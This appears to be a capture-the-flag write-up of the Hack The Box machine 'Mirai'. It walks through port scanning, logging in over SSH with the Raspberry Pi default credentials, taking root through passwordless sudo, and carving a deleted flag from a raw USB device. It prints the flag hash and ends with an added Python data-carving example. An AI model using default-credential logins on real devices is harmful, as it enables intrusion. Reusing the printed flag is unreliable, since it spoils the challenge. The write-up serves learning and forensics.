# HTB - Mirai

![Mirai](/files/-M3ni0e-Kydo_57q0ANI)

## Getting Root:

1. The box reveals that it is running **pi-hole**, an application designed for use on embedded devices such as the Raspberry Pi.
2. We can SSH to the box using the Raspberry Pi default credentials and notice that we have full privileges through sudo.

### Tools Used:

**`nmap, dirsearch.py, ssh, grep`**

## Nmap:

```bash
# Nmap 7.80 scan initiated Tue Mar 31 17:15:24 2020 as: nmap -sC -sV -p- -oA nmap/Mirai.allports 10.10.10.48  
Nmap scan report for 10.10.10.48
Host is up (0.042s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1771/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 31 17:16:05 2020 -- 1 IP address (1 host up) scanned in 40.63 seconds
```

## Enumeration

### HTTP - Port 80

```bash
# dirsearch.py -u http://10.10.10.48 -E -t 30
[sudo] password for kali: 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 8674 

Error Log: /opt/dirsearch/logs/errors-20-03-31_23-28-43.log

Target: http://10.10.10.48

[23:28:43] Starting: 
[23:28:47] 301 -    0B  - /admin  ->  http://10.10.10.48/admin/
[23:28:47] 200 -   14KB - /admin/
[23:28:47] 200 -   14KB - /admin/?/login
[23:28:47] 200 -   14KB - /admin/index.php

Task Completed
kali@oscp:~/HackTheBox/Mirai$ 

```

#### Checking **`/admin`**

![](/files/-M3nmZgtb8-NR4vdQwdM)

A basic Google search for Raspberry Pi default credentials shows:\
**Username:** **`pi`**\
**Password:** **`raspberry`**

## Getting Access

```bash
# ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
pi@raspberrypi:~ $ 

```

## Privilege Escalation

```bash
sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

```

## Root

```bash
pi@raspberrypi:~ $ sudo su -

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

root@raspberrypi:~# id
uid=0(root) gid=0(root) groups=0(root)
root@raspberrypi:~# 

```

### Missing Flag

```bash
root@raspberrypi:~# ls -la
total 22
drwx------  3 root root 4096 Aug 27  2017 .
drwxr-xr-x 35 root root 4096 Aug 14  2017 ..
-rw-------  1 root root  549 Dec 24  2017 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r--r--  1 root root   76 Aug 14  2017 root.txt
drwx------  2 root root 4096 Aug 27  2017 .ssh
root@raspberrypi:~# cat root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...
root@raspberrypi:~# 

```

The note says that a backup of the root flag may be on a USB stick, so we checked for mounted devices and noticed **`/media/usbstick`**.

```bash
root@raspberrypi:~# df -hT
Filesystem     Type      Size  Used Avail Use% Mounted on
aufs           aufs      8.5G  2.8G  5.3G  35% /
tmpfs          tmpfs     100M  4.8M   96M   5% /run
/dev/sda1      iso9660   1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0     squashfs  1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs          tmpfs     250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2      ext4      8.5G  2.8G  5.3G  35% /lib/live/mount/persistence/sda2
devtmpfs       devtmpfs   10M     0   10M   0% /dev
tmpfs          tmpfs     250M  8.0K  250M   1% /dev/shm
tmpfs          tmpfs     5.0M  4.0K  5.0M   1% /run/lock
tmpfs          tmpfs     250M     0  250M   0% /sys/fs/cgroup
tmpfs          tmpfs     250M  8.0K  250M   1% /tmp
/dev/sdb       ext4      8.7M   93K  7.9M   2% /media/usbstick
tmpfs          tmpfs      50M     0   50M   0% /run/user/999
tmpfs          tmpfs      50M     0   50M   0% /run/user/1000

```

But the flag was gone; only a note about the deleted files remained.

```bash
root@raspberrypi:~# cd /media/usbstick/
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James
root@raspberrypi:/media/usbstick# 

```

Doing some forensics on the /dev/sdb device showed some interesting pieces of data, such as **`root.txt`** and what looked like a hash. Deleting a file on ext4 only removes its directory entry and marks its blocks free; the data stays on disk until those blocks are reused. In Linux everything is a file, so a simple use of strings and grep on the raw device did the job.

```bash
root@raspberrypi:~# strings /dev/sdb 
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James


OR

root@raspberrypi:~# egrep -a "([a-z0-9]){32}" /dev/sdb 
|}*,.+-3d3e483143ff12ec505d026fa13e020b
root@raspberrypi:~# 

```
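To show why carving the raw device works, and how to do it without reading a whole disk into memory, here is an added Python example (not from the writeup): it carves printable strings and 32-hex tokens from a constructed sample image, streaming in chunks the way you would over /dev/sdb. The image bytes, the placeholder token and all function names are constructed for this example.

```python
import io
import re
# Constructed sample "raw device" image (not the box's real disk): filler,
# leftover directory-entry names, a placeholder 32-hex token standing in for
# the flag, and the deleted note's text, all still on disk after unlink.
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"
    + b"\x8f\x02\x11" * 16
    + b"0123456789abcdef0123456789abcdef\n"
    + b"\xff" * 32
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + b"Do you know if there is any way to get them back?\n-James\n"
    + b"\x00" * 64
)
# Same pattern the writeup greps for; lookarounds reject longer hex runs.
HEX32 = re.compile(rb"(?<![0-9a-f])[0-9a-f]{32}(?![0-9a-f])")

def carve_strings(data, min_len=4):
    """(offset, text) for each printable run of >= min_len bytes, i.e. what
    strings(1) prints, plus the byte offset so each hit can be located."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pat.finditer(data)]

def carve_hex32(data):
    """(offset, token) for every 32-char lowercase hex run in the bytes."""
    return [(m.start(), m.group().decode("ascii")) for m in HEX32.finditer(data)]

def scan_stream(f, chunk_size=1 << 20, overlap=64):
    """Stream a device/image in chunks; the previous chunk's tail is prepended
    so a token straddling a boundary is still matched (hits deduped by offset)."""
    found, base, tail = {}, 0, b""
    while True:
        buf = f.read(chunk_size)
        if not buf:
            break
        data = tail + buf
        start = base - len(tail)  # absolute offset of data[0]
        for off, tok in carve_hex32(data):
            found.setdefault(start + off, tok)
        tail, base = data[-overlap:], base + len(buf)
    return sorted(found.items())

def scan_bytes(data, **kw):
    """Chunked scan over an in-memory image (handy for tests)."""
    return scan_stream(io.BytesIO(data), **kw)

def scan_device(path, **kw):
    """Chunked scan over a raw device or image file, e.g. /dev/sdb."""
    with open(path, "rb") as f:
        return scan_stream(f, **kw)
```

The same check, run against a drive before it is reused or handed back, tells you whether a "deleted" secret is still sitting in unallocated blocks.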
